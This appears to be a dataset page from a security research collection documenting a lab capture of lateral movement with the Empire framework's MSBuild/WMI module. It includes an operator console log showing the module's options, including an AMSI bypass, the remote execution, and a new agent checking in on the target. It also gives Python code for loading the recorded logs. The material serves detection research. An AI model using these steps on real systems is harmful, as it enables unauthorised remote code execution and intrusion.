Empire Invoke Execute MSBuild
Contents
Empire Invoke Execute MSBuild#
Metadata#
Contributors |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2019/05/18 |
Modification Date |
2020/09/20 |
Tactics |
|
Techniques |
|
Tags |
WMI IWbemServices ExecMethod,SMB CreateRequest |
Dataset Description#
This dataset represents an adversary remotely creating a file (.xml) via SMB and executing it remotetly via WMI and msbuild. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.
Datasets Downloads#
Type |
Link |
|---|---|
Host |
|
Network |
Adversary View#
(Empire: stager/multi/launcher) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
A7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http
HBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http
UF5MYK42 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 6404 5/0.0 2020-09-20 21:28:07 http
AWTK7BX5 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 2228 5/0.0 2020-09-20 21:33:05 http
(Empire: agents) > interact AWTK7BX5
(Empire: AWTK7BX5) > usemodule lateral_movement/invoke_executemsbuild
(Empire: powershell/lateral_movement/invoke_executemsbuild) > info
Name: Invoke-ExecuteMSBuild
Module: powershell/lateral_movement/invoke_executemsbuild
NeedsAdmin: False
OpsecSafe: False
Language: powershell
MinLanguageVersion: 2
Background: False
OutputExtension: None
Authors:
@xorrior
Description:
This module utilizes WMI and MSBuild to compile and execute
an xml file containing an Empire launcher
Comments:
Inspired by @subtee
http://subt0x10.blogspot.com/2016/09/bypassing-application-
whitelisting.html
Options:
Name Required Value Description
---- -------- ------- -----------
Agent True AWTK7BX5 Agent to run module from.
Listener False Listener to use.
Command False Custom command to run.
Obfuscate False False Switch. Obfuscate the launcher
powershell code, uses the
ObfuscateCommand for obfuscation types.
For powershell only.
ObfuscateCommand False Token\All\1 The Invoke-Obfuscation command to use.
Only used if Obfuscate switch is True.
For powershell only.
AMSIBypass False True Include mattifestation's AMSI Bypass in
the stager code.
AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in
the stager code.
CredID False CredID from the store to use.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Proxy False default Proxy to use for request (default, none,
or other).
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
ComputerName True Host to target
UserName False UserName if executing with credentials
Password False Password if executing with credentials
FilePath False Desired location to copy the xml file on
the target
DriveLetter False Drive letter to use when mounting the
share locally
(Empire: powershell/lateral_movement/invoke_executemsbuild) > set Listener http
(Empire: powershell/lateral_movement/invoke_executemsbuild) > set ComputerName WORKSTATION6.theshire.local
(Empire: powershell/lateral_movement/invoke_executemsbuild) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked AWTK7BX5 to run TASK_CMD_WAIT
[*] Agent AWTK7BX5 tasked with task ID 1
[*] Tasked agent AWTK7BX5 to run module powershell/lateral_movement/invoke_executemsbuild
(Empire: powershell/lateral_movement/invoke_executemsbuild) >
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6
[*] New agent U63RL1XZ checked in
[+] Initial agent U63RL1XZ from 172.18.39.6 now active (Slack)
[*] Sending agent (stage 2) to U63RL1XZ at 172.18.39.6
__GENUS : 2
__CLASS : __PARAMETERS
__SUPERCLASS :
__DYNASTY : __PARAMETERS
__RELPATH :
__PROPERTY_COUNT : 2
__DERIVATION : {}
__SERVER :
__NAMESPACE :
__PATH :
ProcessId : 6952
ReturnValue : 0
PSComputerName :
(Empire: powershell/lateral_movement/invoke_executemsbuild) >
(Empire: powershell/lateral_movement/invoke_executemsbuild) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
A7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http
HBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http
UF5MYK42 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 6404 5/0.0 2020-09-20 21:28:07 http
AWTK7BX5 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 2228 5/0.0 2020-09-20 21:39:34 http
U63RL1XZ ps 172.18.39.6 WORKSTATION6 *THESHIRE\pgustavo powershell 3008 5/0.0 2020-09-20 21:39:35 http
(Empire: agents) > interact U63RL1XZ
(Empire: U63RL1XZ) > shell whoami
[*] Tasked U63RL1XZ to run TASK_SHELL
[*] Agent U63RL1XZ tasked with task ID 1
(Empire: U63RL1XZ) >
theshire\pgustavo
..Command execution completed.
(Empire: U63RL1XZ) >
Explore Datasets#
Download & Decompress Dataset#
import requests
from zipfile import ZipFile
from io import BytesIO
url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_msbuild_dcerpc_wmi_smb.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File#
from pandas.io import json
df = json.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events#
df.groupby(['Channel']).size().sort_values(ascending=False)